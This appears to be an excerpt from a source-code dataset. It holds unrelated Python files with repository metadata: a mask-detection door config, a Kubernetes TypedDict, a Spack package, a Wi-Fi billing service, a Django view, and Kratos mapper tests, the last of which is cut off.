AWS_API_GATEWAY = Knob(env_name="AWS_API_GATEWAY", default="https://m5k4jhx1ka.execute-api.us-east-1.amazonaws.com/dev/", description="AWS API Gateway Endpoint")
MIN_PERCENTAGE_DIFF = Knob(env_name="MIN_PERCENTAGE_DIFF", default=50,
description="Minimum difference between frames to send")
PERSON_PERCENTAGE = Knob(env_name="PERSON_PERCENTAGE", default=10,
description="Minimum probability to consider it being a person")
NO_MASK_THRESHOLD = Knob(env_name="NO_MASK_THRESHOLD", default=50, description="Minimum threshold to measure no mask.")
OPEN_TIME = Knob(env_name="OPEN_TIME", default=5, description="Time to open door in seconds.")
DOOR_OUT_PIN = Knob(env_name="DOOR_OUT_PIN", default=35, description="Pin the door latch is connected to")
DOOR_OVERRIDE_BUTTON = Knob(env_name="DOOR_OVERRIDE_BUTTON", default=37,
description="Pin that the override button is connected to")
| 51.714286
| 161
| 0.726519
|
from knobs import Knob
from socket import gethostname
CAMERA_NUMBER = Knob(env_name="CAMERA_NUMBER", default=0,
description="Raspberry Pi camera number according to "
"https://picamera.readthedocs.io/en/release-1.13/api_camera.html#picamera")
INVERT_CAMERA = Knob(env_name="CAMERA_INVERT", default=True, description="Vertical invert camera")
DEVICE_NAME = Knob(env_name="DEVICE_NAME", default=gethostname(), description="Device Name")
AWS_REGION = Knob(env_name="AWS_REGION", default='us-east=1', description="AWS region that your resources live in")
MODEL_ENDPOINT_NAME = Knob(env_name="AWS_MODEL_ENDPOINT_NAME", default=False,
description="AWS Model endpoint for CVEDIA Human Detector")
AWS_API_GATEWAY = Knob(env_name="AWS_API_GATEWAY", default="https://m5k4jhx1ka.execute-api.us-east-1.amazonaws.com/dev/", description="AWS API Gateway Endpoint")
MIN_PERCENTAGE_DIFF = Knob(env_name="MIN_PERCENTAGE_DIFF", default=50,
description="Minimum difference between frames to send")
PERSON_PERCENTAGE = Knob(env_name="PERSON_PERCENTAGE", default=10,
description="Minimum probability to consider it being a person")
NO_MASK_THRESHOLD = Knob(env_name="NO_MASK_THRESHOLD", default=50, description="Minimum threshold to measure no mask.")
OPEN_TIME = Knob(env_name="OPEN_TIME", default=5, description="Time to open door in seconds.")
DOOR_OUT_PIN = Knob(env_name="DOOR_OUT_PIN", default=35, description="Pin the door latch is connected to")
DOOR_OVERRIDE_BUTTON = Knob(env_name="DOOR_OVERRIDE_BUTTON", default=37,
description="Pin that the override button is connected to")
| true
| true
|
1c4924bb20432bd7d11510e29208dac1453c8851
| 339
|
py
|
Python
|
kubernetes_typed/client/models/v2beta1_cross_version_object_reference.py
|
nikhiljha/kubernetes-typed
|
4f4b969aa400c88306f92560e56bda6d19b2a895
|
[
"Apache-2.0"
] | 22
|
2020-12-10T13:06:02.000Z
|
2022-02-13T21:58:15.000Z
|
kubernetes_typed/client/models/v2beta1_cross_version_object_reference.py
|
nikhiljha/kubernetes-typed
|
4f4b969aa400c88306f92560e56bda6d19b2a895
|
[
"Apache-2.0"
] | 4
|
2021-03-08T07:06:12.000Z
|
2022-03-29T23:41:45.000Z
|
kubernetes_typed/client/models/v2beta1_cross_version_object_reference.py
|
nikhiljha/kubernetes-typed
|
4f4b969aa400c88306f92560e56bda6d19b2a895
|
[
"Apache-2.0"
] | 2
|
2021-09-05T19:18:28.000Z
|
2022-03-14T02:56:17.000Z
|
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V2beta1CrossVersionObjectReferenceDict generated type."""
from typing import TypedDict
V2beta1CrossVersionObjectReferenceDict = TypedDict(
"V2beta1CrossVersionObjectReferenceDict",
{
"apiVersion": str,
"kind": str,
"name": str,
},
total=False,
)
| 24.214286
| 60
| 0.690265
|
from typing import TypedDict
V2beta1CrossVersionObjectReferenceDict = TypedDict(
"V2beta1CrossVersionObjectReferenceDict",
{
"apiVersion": str,
"kind": str,
"name": str,
},
total=False,
)
| true
| true
|
1c4926361dab09cb57d6a664d216e7a0e927ff3b
| 630
|
py
|
Python
|
var/spack/repos/builtin/packages/tinyobjloader/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/tinyobjloader/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2021-11-09T20:28:40.000Z
|
2022-03-15T03:26:33.000Z
|
var/spack/repos/builtin/packages/tinyobjloader/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-08T20:37:20.000Z
|
2019-03-31T15:19:26.000Z
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Tinyobjloader(CMakePackage):
"""Tiny but powerful single file wavefront obj loader."""
homepage = "https://github.com/tinyobjloader/tinyobjloader"
url = "https://github.com/tinyobjloader/tinyobjloader/archive/refs/tags/v1.0.6.tar.gz"
version('1.0.6', sha256='19ee82cd201761954dd833de551edb570e33b320d6027e0d91455faf7cd4c341')
depends_on('cmake@2.8.11:', type='build')
| 35
| 95
| 0.749206
|
from spack.package import *
class Tinyobjloader(CMakePackage):
homepage = "https://github.com/tinyobjloader/tinyobjloader"
url = "https://github.com/tinyobjloader/tinyobjloader/archive/refs/tags/v1.0.6.tar.gz"
version('1.0.6', sha256='19ee82cd201761954dd833de551edb570e33b320d6027e0d91455faf7cd4c341')
depends_on('cmake@2.8.11:', type='build')
| true
| true
|
1c49296bf4eb5e9772b93dad7e955a46f4cb4516
| 11,549
|
py
|
Python
|
bg_biz/service/config_service.py
|
sluggard6/bgirl
|
3c9fa895189ef16442694830d0c05cf60ee5187b
|
[
"Apache-2.0"
] | null | null | null |
bg_biz/service/config_service.py
|
sluggard6/bgirl
|
3c9fa895189ef16442694830d0c05cf60ee5187b
|
[
"Apache-2.0"
] | null | null | null |
bg_biz/service/config_service.py
|
sluggard6/bgirl
|
3c9fa895189ef16442694830d0c05cf60ee5187b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
from datetime import datetime
import json
from flask import current_app, g
from sqlalchemy import and_, or_
from sharper.flaskapp.orm.display_enum import DisplayEnum
from sharper.lib.error import AppError
from sharper.util.app_util import get_package_name
import time
from sharper.util.file import get_file_fix
from bg_biz.orm.sysconfig import SysConfig
__author__ = [
'"liubo" <liubo@hi-wifi.cn>'
]
class ConfigService(object):
class Host(DisplayEnum):
API = "api"
MOBILE = "mobile"
CARD = "card"
PORTAL = "portal"
REGISTER = "register"
STATIC = "static"
STATIC_HTTPS = "static_https"
STATIC_CDN = 'static_cdn'
ADMIN = 'admin'
PAUTH = 'pauth'
__display_cn__ = {
API: u"api",
MOBILE: u"移动版",
CARD: u"充值卡",
PORTAL: u"PORTAL页",
REGISTER: u"注册应用",
STATIC: u"静态资源",
STATIC_HTTPS: u"静态资源https",
STATIC_CDN: u"静态资源CDN",
ADMIN: u"后台",
PAUTH: u"认证服务器"
}
@classmethod
def get_month_fee(cls, month, area_id=None):
for month_config in cls.get_month_fee_config(area_id):
if month == month_config.get('month'):
return month_config.get('amount')
raise AppError(u"")
@classmethod
def get_month_fee_config(cls, area_id=None):
yingkou_area_ids = SysConfig.get_json("yingkou_area_ids")
# 营口富士康的单价单独配置,这个等protal迁移时重构
config_name = "month_fee_price"
if area_id:
if area_id in yingkou_area_ids:
config_name = "month_fee_price_yingkou"
else:
area_config = SysConfig.get_json("area_config")
area_id_str = str(area_id)
if area_id_str in area_config and area_config.get(area_id_str) == "foxconn":
config_name = "month_fee_price_foxconn"
else:
# foxconn的单独配置
if area_util.is_foxconn():
config_name = "month_fee_price_foxconn"
return SysConfig.get_json(config_name)
@classmethod
def get_host(cls, host):
host_config = SysConfig.get_json("hosts")
return host_config.get(host)
@classmethod
def __update_info_key__(cls, apk_info, is_preview=False):
if apk_info['is_foxconn']:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
package_name = apk_info['package_name']
if package_name.find("com.jz") != -1:
key = "%s_old" % key
return key
@classmethod
def update_app_info(cls, apk_info, content, is_preview=False):
key = cls.__update_info_key__(apk_info, is_preview=is_preview)
config = SysConfig.get(key)
update_info = json.loads(config.value)
update_info['code'] = apk_info['version_code']
update_info['name'] = apk_info['version_name']
update_info['time'] = int(round(time.time() * 1000))
update_info['content'] = content
update_info['size'] = apk_info['size']
config.value = json.dumps(update_info)
config.update()
return True
@classmethod
def __get_info_key__(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
'''
针对客户端访问
'''
if not is_foxconn:
is_foxconn = area_util.is_foxconn()
if is_foxconn:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
elif user:
# 灰度发布配置
preview_config = SysConfig.get_json("grey_dist")
if preview_config.get('active', False):
if user.area_id and user.area_id in preview_config.get('area_ids'):
key = "%s_preview" % key
# 根据包名判断是否老的包,老的包使用老的版本继续维护
if not is_old:
package_name = get_package_name()
if package_name.find("com.jz") != -1:
is_old = True
if is_old:
key = "%s_old" % key
return key
@classmethod
def get_app_update_info(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
key = cls.__get_info_key__(is_foxconn=is_foxconn, user=user, is_preview=is_preview, is_old=is_old)
return SysConfig.get_json(key)
@classmethod
def get_wifi_score(cls, day):
for score_config in cls.get_wifi_score_config():
if day == score_config.get('day'):
return score_config.get('score')
return None
@classmethod
def get_wifi_score_config(cls):
# foxconn的单独配置
if area_util.is_foxconn():
config_name = "wifi_score_foxconn"
else:
config_name = "wifi_score"
return SysConfig.get_json(config_name)
@classmethod
def get_close_wifi_fee(cls, amount):
config = sorted(filter(lambda x: int(x["amount"]) >= amount, cls.get_wifi_fee_config()), lambda x: x["amount"],
reverse=True)
return config[0]["amount"] if config else None
@classmethod
def get_wifi_fee(cls, day, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None, with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if day == fee_config.get('day'):
return fee_config.get('amount')
raise AppError(u"")
@classmethod
def get_wifi_day(cls, amount, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if amount == fee_config.get('amount'):
return fee_config.get('day')
# raise AppError(u"")
return 0
@classmethod
def get_wifi_fee_config(cls, type=None, area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
if type == "apple":
config = SysConfig.get_json("wifi_fee_apple")
else:
#特殊区域充值价格5元30天如营口区域id54
special_wifi_fee_config = SysConfig.get_json("special_wifi_fee_config")
special_wifi_fee_config = special_wifi_fee_config if special_wifi_fee_config else {}
is_special = False
if special_wifi_fee_config.has_key(str(area_id)):
is_special = True
#铜梁
if area_id == 188:
config_name = "wifi_fee_tl"
config = SysConfig.get_json(config_name)
elif is_special:
config = special_wifi_fee_config[str(area_id)]
else:
if type == "portal":
config_name = "wifi_fee_portal"
elif type == "card":
config_name = "wifi_fee_card"
else:
if area_util.is_foxconn():
config_name = "wifi_fee_foxconn"
else:
config_name = "wifi_fee"
config = SysConfig.get_json(config_name)
if with_discount:
discount_rule = DiscountRule.query.filter_by(category=DiscountRule.Category.WIFI).\
filter(and_(or_(DiscountRule.start_time<datetime.now(),DiscountRule.start_time==None),or_(DiscountRule.end_time>datetime.now(),DiscountRule.start_time==None)))\
.filter_by(display_type=DiscountRule.DisplayType.ALL).order_by(DiscountRule.rank).first()
for w in config:
if discount_rule:
if w["day"]==int(discount_rule.product):
if discount_rule.type == DiscountRule.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_rule.discount)/100)
elif discount_rule.type == DiscountRule.Type.DEL:
w["amount"] = w["amount"]-float(discount_rule.discount)
w["msg"] = discount_rule.name
w["discount_info"] = discount_rule.key
if not w.has_key("discount_info") and user:
discount_user_rule = UserDiscountInfo.query.filter_by(user_id=user.id).filter_by(product=str(w['day'])).filter_by(category=UserDiscountInfo.Category.WIFI).\
filter(and_(or_(UserDiscountInfo.start_time<datetime.now(),UserDiscountInfo.start_time==None),or_(UserDiscountInfo.end_time>datetime.now(),UserDiscountInfo.start_time==None)))\
.filter_by(status=UserDiscountInfo.Status.NEW).order_by(UserDiscountInfo.create_time).first()
if discount_user_rule:
if discount_user_rule.type == UserDiscountInfo.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_user_rule.discount)/100)
elif discount_user_rule.type == UserDiscountInfo.Type.DEL:
w["amount"] = w["amount"]-float(discount_user_rule.discount)
w["msg"] = discount_user_rule.name
w["discount_info"] = discount_user_rule.key
w["discount_id"] = discount_user_rule.id
return config
@classmethod
def get_image_url(cls, image):
return "%s/image/%s" % (cls.get_host(cls.Host.STATIC), image) if image else None
@classmethod
def get_apk_url(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC), apk_path) if apk_path else None
@classmethod
def get_apk_url_https(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC_CDN), apk_path) if apk_path else None
@classmethod
def get_avatar_url(cls, avatar):
return "%s/avatar/%s" % (cls.get_host(cls.Host.STATIC), avatar) if avatar else None
@classmethod
def load_photo_http_all(cls, uri):
def get_media_handler_ext_fix_path(file_path, media_type, handler):
ext = current_app.config['UPLOAD_HANDLER'][media_type]['handlers'][handler].get('ext')
return get_file_fix(file_path, ext) if ext else file_path
http_ref = "%s/photo/" % cls.get_host(cls.Host.STATIC_CDN)
sdd = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'standard')
thumb = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'thumb')
dic = dict(
big=http_ref + uri,
standard=sdd,
small=sdd,
thumb=thumb,
thumb_small=thumb
)
return dic['big'], dic['standard'], dic['small'], dic['thumb'], dic['thumb_small']
@classmethod
def get_area_by_id(cls, area_id):
area_config = SysConfig.get_json("area_config")
from sharper.util import area_util
area = area_util.Area.NORMAL
if str(area_id) in area_config:
area = area_config.get(str(area_id))
return area
| 41.844203
| 201
| 0.591393
|
from datetime import datetime
import json
from flask import current_app, g
from sqlalchemy import and_, or_
from sharper.flaskapp.orm.display_enum import DisplayEnum
from sharper.lib.error import AppError
from sharper.util.app_util import get_package_name
import time
from sharper.util.file import get_file_fix
from bg_biz.orm.sysconfig import SysConfig
__author__ = [
'"liubo" <liubo@hi-wifi.cn>'
]
class ConfigService(object):
class Host(DisplayEnum):
API = "api"
MOBILE = "mobile"
CARD = "card"
PORTAL = "portal"
REGISTER = "register"
STATIC = "static"
STATIC_HTTPS = "static_https"
STATIC_CDN = 'static_cdn'
ADMIN = 'admin'
PAUTH = 'pauth'
__display_cn__ = {
API: u"api",
MOBILE: u"移动版",
CARD: u"充值卡",
PORTAL: u"PORTAL页",
REGISTER: u"注册应用",
STATIC: u"静态资源",
STATIC_HTTPS: u"静态资源https",
STATIC_CDN: u"静态资源CDN",
ADMIN: u"后台",
PAUTH: u"认证服务器"
}
@classmethod
def get_month_fee(cls, month, area_id=None):
for month_config in cls.get_month_fee_config(area_id):
if month == month_config.get('month'):
return month_config.get('amount')
raise AppError(u"")
@classmethod
def get_month_fee_config(cls, area_id=None):
yingkou_area_ids = SysConfig.get_json("yingkou_area_ids")
config_name = "month_fee_price"
if area_id:
if area_id in yingkou_area_ids:
config_name = "month_fee_price_yingkou"
else:
area_config = SysConfig.get_json("area_config")
area_id_str = str(area_id)
if area_id_str in area_config and area_config.get(area_id_str) == "foxconn":
config_name = "month_fee_price_foxconn"
else:
if area_util.is_foxconn():
config_name = "month_fee_price_foxconn"
return SysConfig.get_json(config_name)
@classmethod
def get_host(cls, host):
host_config = SysConfig.get_json("hosts")
return host_config.get(host)
@classmethod
def __update_info_key__(cls, apk_info, is_preview=False):
if apk_info['is_foxconn']:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
package_name = apk_info['package_name']
if package_name.find("com.jz") != -1:
key = "%s_old" % key
return key
@classmethod
def update_app_info(cls, apk_info, content, is_preview=False):
key = cls.__update_info_key__(apk_info, is_preview=is_preview)
config = SysConfig.get(key)
update_info = json.loads(config.value)
update_info['code'] = apk_info['version_code']
update_info['name'] = apk_info['version_name']
update_info['time'] = int(round(time.time() * 1000))
update_info['content'] = content
update_info['size'] = apk_info['size']
config.value = json.dumps(update_info)
config.update()
return True
@classmethod
def __get_info_key__(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
if not is_foxconn:
is_foxconn = area_util.is_foxconn()
if is_foxconn:
key = "foxconn_update_info"
else:
key = "hiwifi_update_info"
if is_preview:
key = "%s_preview" % key
elif user:
preview_config = SysConfig.get_json("grey_dist")
if preview_config.get('active', False):
if user.area_id and user.area_id in preview_config.get('area_ids'):
key = "%s_preview" % key
if not is_old:
package_name = get_package_name()
if package_name.find("com.jz") != -1:
is_old = True
if is_old:
key = "%s_old" % key
return key
@classmethod
def get_app_update_info(cls, is_foxconn=False, user=None, is_preview=False, is_old=False):
key = cls.__get_info_key__(is_foxconn=is_foxconn, user=user, is_preview=is_preview, is_old=is_old)
return SysConfig.get_json(key)
@classmethod
def get_wifi_score(cls, day):
for score_config in cls.get_wifi_score_config():
if day == score_config.get('day'):
return score_config.get('score')
return None
@classmethod
def get_wifi_score_config(cls):
if area_util.is_foxconn():
config_name = "wifi_score_foxconn"
else:
config_name = "wifi_score"
return SysConfig.get_json(config_name)
@classmethod
def get_close_wifi_fee(cls, amount):
config = sorted(filter(lambda x: int(x["amount"]) >= amount, cls.get_wifi_fee_config()), lambda x: x["amount"],
reverse=True)
return config[0]["amount"] if config else None
@classmethod
def get_wifi_fee(cls, day, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None, with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if day == fee_config.get('day'):
return fee_config.get('amount')
raise AppError(u"")
@classmethod
def get_wifi_day(cls, amount, type=None,area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
for fee_config in cls.get_wifi_fee_config(type, area_id=area_id, user=user, pay_by=pay_by, pay_for=pay_for, discount_info=discount_info, with_discount=with_discount):
if amount == fee_config.get('amount'):
return fee_config.get('day')
return 0
@classmethod
def get_wifi_fee_config(cls, type=None, area_id=0, user=None, pay_by=False, pay_for=False, discount_info=None,with_discount=True):
if type == "apple":
config = SysConfig.get_json("wifi_fee_apple")
else:
special_wifi_fee_config = SysConfig.get_json("special_wifi_fee_config")
special_wifi_fee_config = special_wifi_fee_config if special_wifi_fee_config else {}
is_special = False
if special_wifi_fee_config.has_key(str(area_id)):
is_special = True
if area_id == 188:
config_name = "wifi_fee_tl"
config = SysConfig.get_json(config_name)
elif is_special:
config = special_wifi_fee_config[str(area_id)]
else:
if type == "portal":
config_name = "wifi_fee_portal"
elif type == "card":
config_name = "wifi_fee_card"
else:
if area_util.is_foxconn():
config_name = "wifi_fee_foxconn"
else:
config_name = "wifi_fee"
config = SysConfig.get_json(config_name)
if with_discount:
discount_rule = DiscountRule.query.filter_by(category=DiscountRule.Category.WIFI).\
filter(and_(or_(DiscountRule.start_time<datetime.now(),DiscountRule.start_time==None),or_(DiscountRule.end_time>datetime.now(),DiscountRule.start_time==None)))\
.filter_by(display_type=DiscountRule.DisplayType.ALL).order_by(DiscountRule.rank).first()
for w in config:
if discount_rule:
if w["day"]==int(discount_rule.product):
if discount_rule.type == DiscountRule.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_rule.discount)/100)
elif discount_rule.type == DiscountRule.Type.DEL:
w["amount"] = w["amount"]-float(discount_rule.discount)
w["msg"] = discount_rule.name
w["discount_info"] = discount_rule.key
if not w.has_key("discount_info") and user:
discount_user_rule = UserDiscountInfo.query.filter_by(user_id=user.id).filter_by(product=str(w['day'])).filter_by(category=UserDiscountInfo.Category.WIFI).\
filter(and_(or_(UserDiscountInfo.start_time<datetime.now(),UserDiscountInfo.start_time==None),or_(UserDiscountInfo.end_time>datetime.now(),UserDiscountInfo.start_time==None)))\
.filter_by(status=UserDiscountInfo.Status.NEW).order_by(UserDiscountInfo.create_time).first()
if discount_user_rule:
if discount_user_rule.type == UserDiscountInfo.Type.PERCENT:
w["amount"] = w["amount"]*(float(discount_user_rule.discount)/100)
elif discount_user_rule.type == UserDiscountInfo.Type.DEL:
w["amount"] = w["amount"]-float(discount_user_rule.discount)
w["msg"] = discount_user_rule.name
w["discount_info"] = discount_user_rule.key
w["discount_id"] = discount_user_rule.id
return config
@classmethod
def get_image_url(cls, image):
return "%s/image/%s" % (cls.get_host(cls.Host.STATIC), image) if image else None
@classmethod
def get_apk_url(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC), apk_path) if apk_path else None
@classmethod
def get_apk_url_https(cls, apk_path):
return "%s/apk/%s" % (cls.get_host(cls.Host.STATIC_CDN), apk_path) if apk_path else None
@classmethod
def get_avatar_url(cls, avatar):
return "%s/avatar/%s" % (cls.get_host(cls.Host.STATIC), avatar) if avatar else None
@classmethod
def load_photo_http_all(cls, uri):
def get_media_handler_ext_fix_path(file_path, media_type, handler):
ext = current_app.config['UPLOAD_HANDLER'][media_type]['handlers'][handler].get('ext')
return get_file_fix(file_path, ext) if ext else file_path
http_ref = "%s/photo/" % cls.get_host(cls.Host.STATIC_CDN)
sdd = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'standard')
thumb = http_ref + get_media_handler_ext_fix_path(uri, 'photo', 'thumb')
dic = dict(
big=http_ref + uri,
standard=sdd,
small=sdd,
thumb=thumb,
thumb_small=thumb
)
return dic['big'], dic['standard'], dic['small'], dic['thumb'], dic['thumb_small']
@classmethod
def get_area_by_id(cls, area_id):
area_config = SysConfig.get_json("area_config")
from sharper.util import area_util
area = area_util.Area.NORMAL
if str(area_id) in area_config:
area = area_config.get(str(area_id))
return area
| true
| true
|
1c492a326a630c0812bf986265152c0cc4352601
| 235
|
py
|
Python
|
.history/myblog/views_20200416030503.py
|
abhinavmarwaha/demo-django-blog
|
c80a7d825e44d7e1589d9272c3583764562a2515
|
[
"MIT"
] | null | null | null |
.history/myblog/views_20200416030503.py
|
abhinavmarwaha/demo-django-blog
|
c80a7d825e44d7e1589d9272c3583764562a2515
|
[
"MIT"
] | null | null | null |
.history/myblog/views_20200416030503.py
|
abhinavmarwaha/demo-django-blog
|
c80a7d825e44d7e1589d9272c3583764562a2515
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.views import generic
from .models import Post
class PostList(generic.ListView):
queryset = Post.objects.filter(status=1).order_by('-created_on')
template_name = index.html
| 23.5
| 68
| 0.761702
|
from django.shortcuts import render
from django.views import generic
from .models import Post
class PostList(generic.ListView):
queryset = Post.objects.filter(status=1).order_by('-created_on')
template_name = index.html
| true
| true
|
1c492bb5767583c8fa3013ba7fd04abc59028ca4
| 14,503
|
py
|
Python
|
applications/MappingApplication/tests/basic_mapper_tests.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 2
|
2019-10-25T09:28:10.000Z
|
2019-11-21T12:51:46.000Z
|
applications/MappingApplication/tests/basic_mapper_tests.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 13
|
2019-10-07T12:06:51.000Z
|
2020-02-18T08:48:33.000Z
|
applications/MappingApplication/tests/basic_mapper_tests.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | null | null | null |
from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
import KratosMultiphysics as KM
import KratosMultiphysics.MappingApplication as KratosMapping
data_comm = KM.DataCommunicator.GetDefault()
import mapper_test_case
from math import sin, cos
import os
def GetFilePath(file_name):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), file_name)
class BasicMapperTests(mapper_test_case.MapperTestCase):
'''This class contains basic tests that every mapper should pass
This included e.g. testing if mapping a constant field works
Also it is checked if the mapper-flags are working correctly
'''
@classmethod
def setUpMapper(cls, mapper_parameters, switch_sides=False):
if switch_sides:
super(BasicMapperTests, cls).setUpModelParts("cube_quad", "cube_tri")
else:
super(BasicMapperTests, cls).setUpModelParts("cube_tri", "cube_quad")
# TODO ATTENTION: currently the MapperFactory removes some keys, hence those checks have to be done beforehand => improve this!
cls.mapper_type = mapper_parameters["mapper_type"].GetString()
if mapper_parameters.Has("interface_submodel_part_origin"):
cls.interface_model_part_origin = cls.model_part_origin.GetSubModelPart(
mapper_parameters["interface_submodel_part_origin"].GetString())
else:
cls.interface_model_part_origin = cls.model_part_origin
if mapper_parameters.Has("interface_submodel_part_destination"):
cls.interface_model_part_destination = cls.model_part_destination.GetSubModelPart(
mapper_parameters["interface_submodel_part_destination"].GetString())
else:
cls.interface_model_part_destination = cls.model_part_destination
if data_comm.IsDistributed():
cls.mapper = KratosMapping.MapperFactory.CreateMPIMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
else:
cls.mapper = KratosMapping.MapperFactory.CreateMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
def test_Map_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val)
def test_InverseMap_constant_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val)
def test_Map_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val)
def test_InverseMap_constant_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val)
def test_Map_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_origin.Nodes, KM.PRESSURE)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.TEMPERATURE, GetFilePath(self.__GetFileName("map_scalar")))
def test_InverseMap_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_destination.Nodes, KM.TEMPERATURE)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.PRESSURE, GetFilePath(self.__GetFileName("inverse_map_scalar")))
def test_Map_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_origin.Nodes, KM.FORCE)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.VELOCITY, GetFilePath(self.__GetFileName("map_vector")))
def test_InverseMap_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_destination.Nodes, KM.VELOCITY)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.FORCE, GetFilePath(self.__GetFileName("inverse_map_vector")))
def test_SWAP_SIGN_Map_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, -val)
def test_SWAP_SIGN_InverseMap_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, -val)
def test_SWAP_SIGN_Map_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, [(-1)*x for x in val])
def test_SWAP_SIGN_InverseMap_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
